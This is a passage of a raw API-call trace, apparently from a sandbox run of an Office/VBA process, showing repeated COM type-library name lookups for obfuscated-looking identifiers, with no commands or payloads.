szNameBuf="_B_var_tAkkAB", lHashVal=0x106e43, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.130] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.130] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.130] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tAkkAB", lHashVal=0x106e43, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.130] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.130] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.130] IUnknown:Release (This=0x665ba50) returned 0xd [0069.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1136e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_tAkkAB") returned 14 [0069.130] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tAkkAB", lHashVal=0x106e43, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41006b00000000, pDummy=0x0) returned 0x0 [0069.130] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6260e | out: _Dst=0x144ec0) returned 0x0 [0069.130] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ukAcQ_", lHashVal=0x10dc92, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62636, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ukAcQ_") returned 7 [0069.130] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ukAcQ_", lHashVal=0x10dc92, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62636, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ukAcQ_") returned 7 [0069.130] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ukAcQ_", lHashVal=0x10dc92, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.130] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ukAcQ_") returned 0x10dc92 [0069.130] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="ukAcQ_" | out: _Dst="ukAcQ_") returned 0x0 [0069.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="ukAcQ_") returned 7 [0069.130] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.130] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ukAcQ_", lHashVal=0x10dc92, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.130] IUnknown:Release (This=0x665ba50) returned 0xd [0069.130] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.131] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ukAcQ_", lHashVal=0x10dc92, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.131] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.131] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.131] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ukAcQ_", lHashVal=0x10dc92, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.131] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.131] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.131] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ukAcQ_", lHashVal=0x10dc92, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.131] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62636, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ukAcQ_") returned 7 [0069.131] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ukAcQ_", lHashVal=0x10dc92, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.131] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.131] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a62636 | out: _Dst=0x67c2d40) returned 0x0 [0069.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ukAcQ_") returned 0x1056fc [0069.131] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_ukAcQ_" | out: _Dst="_B_var_ukAcQ_") returned 0x0 [0069.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_ukAcQ_") returned 14 [0069.131] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.131] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ukAcQ_", lHashVal=0x1056fc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.131] IUnknown:Release (This=0x665ba50) returned 0xd [0069.131] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.131] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ukAcQ_", lHashVal=0x1056fc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.131] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.131] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.131] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ukAcQ_", lHashVal=0x1056fc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.131] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.131] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.131] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ukAcQ_", lHashVal=0x1056fc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.131] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.132] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.132] IUnknown:Release (This=0x665ba50) returned 0xd [0069.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1139e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_ukAcQ_") returned 14 [0069.132] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ukAcQ_", lHashVal=0x1056fc, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x51006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x51006300000000, pDummy=0x0) returned 0x0 [0069.132] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a62636 | out: _Dst=0x144ec0) returned 0x0 [0069.132] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zoUAAoCA", lHashVal=0x10e4c1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62686, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zoUAAoCA") returned 9 [0069.132] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zoUAAoCA", lHashVal=0x10e4c1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62686, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zoUAAoCA") returned 9 [0069.132] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zoUAAoCA", lHashVal=0x10e4c1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zoUAAoCA") returned 0x10e4c1 [0069.132] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="zoUAAoCA" | out: _Dst="zoUAAoCA") returned 0x0 [0069.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="zoUAAoCA") returned 9 [0069.132] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.132] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zoUAAoCA", lHashVal=0x10e4c1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.132] IUnknown:Release (This=0x665ba50) returned 0xd [0069.132] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.132] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zoUAAoCA", lHashVal=0x10e4c1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.132] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.132] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.133] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zoUAAoCA", lHashVal=0x10e4c1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.133] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.133] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.133] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zoUAAoCA", lHashVal=0x10e4c1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.133] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62686, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zoUAAoCA") returned 9 [0069.133] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zoUAAoCA", lHashVal=0x10e4c1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.133] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.133] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62686 | out: _Dst=0x67c2d40) returned 0x0 [0069.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zoUAAoCA") returned 0x10bc4a [0069.133] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_zoUAAoCA" | out: _Dst="_B_var_zoUAAoCA") returned 0x0 [0069.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_zoUAAoCA") returned 16 [0069.133] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.133] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zoUAAoCA", lHashVal=0x10bc4a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.133] IUnknown:Release (This=0x665ba50) returned 0xd [0069.133] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.133] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zoUAAoCA", lHashVal=0x10bc4a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.133] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.133] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.133] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zoUAAoCA", lHashVal=0x10bc4a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.133] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.133] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.133] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zoUAAoCA", lHashVal=0x10bc4a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.133] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.133] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.133] IUnknown:Release (This=0x665ba50) returned 0xd [0069.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b113ce, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_zoUAAoCA") returned 16 [0069.133] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zoUAAoCA", lHashVal=0x10bc4a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.134] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62686 | out: _Dst=0x144ec0) returned 0x0 [0069.134] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tAxACAU", lHashVal=0x104e8c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6265e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="tAxACAU") returned 8 [0069.134] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tAxACAU", lHashVal=0x104e8c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6265e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="tAxACAU") returned 8 [0069.134] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tAxACAU", lHashVal=0x104e8c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAxACAU") returned 0x104e8c [0069.134] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="tAxACAU" | out: _Dst="tAxACAU") returned 0x0 [0069.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="tAxACAU") returned 8 [0069.134] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.134] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tAxACAU", lHashVal=0x104e8c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.134] IUnknown:Release (This=0x665ba50) returned 0xd [0069.134] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.134] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tAxACAU", lHashVal=0x104e8c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.134] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.134] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.134] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tAxACAU", lHashVal=0x104e8c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.134] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.134] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.134] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tAxACAU", lHashVal=0x104e8c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.134] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6265e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="tAxACAU") returned 8 [0069.135] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tAxACAU", lHashVal=0x104e8c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.135] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.135] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6265e | out: _Dst=0x67c2d40) returned 0x0 [0069.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tAxACAU") returned 0x105210 [0069.135] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_tAxACAU" | out: _Dst="_B_var_tAxACAU") returned 0x0 [0069.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_tAxACAU") returned 15 [0069.135] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.135] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tAxACAU", lHashVal=0x105210, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.135] IUnknown:Release (This=0x665ba50) returned 0xd [0069.135] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.135] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tAxACAU", lHashVal=0x105210, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.135] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.135] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.135] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tAxACAU", lHashVal=0x105210, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.135] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.135] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.135] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tAxACAU", lHashVal=0x105210, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.135] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.135] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.135] IUnknown:Release (This=0x665ba50) returned 0xd [0069.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b113fe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_tAxACAU") returned 15 [0069.135] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tAxACAU", lHashVal=0x105210, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x43004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x43004100000000, pDummy=0x0) returned 0x0 [0069.135] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6265e | out: _Dst=0x144ec0) returned 0x0 [0069.135] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HADBXB", lHashVal=0x104ef2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a626da, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HADBXB") returned 7 [0069.136] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HADBXB", lHashVal=0x104ef2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a626da, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HADBXB") returned 7 [0069.136] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HADBXB", lHashVal=0x104ef2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HADBXB") returned 0x104ef2 [0069.136] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="HADBXB" | out: _Dst="HADBXB") returned 0x0 [0069.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="HADBXB") returned 7 [0069.136] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.136] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HADBXB", lHashVal=0x104ef2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.136] IUnknown:Release (This=0x665ba50) returned 0xd [0069.136] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.136] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HADBXB", lHashVal=0x104ef2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.136] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.136] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.136] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HADBXB", lHashVal=0x104ef2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.136] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.136] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.136] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HADBXB", lHashVal=0x104ef2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.136] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a626da, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HADBXB") returned 7 [0069.136] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HADBXB", lHashVal=0x104ef2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, 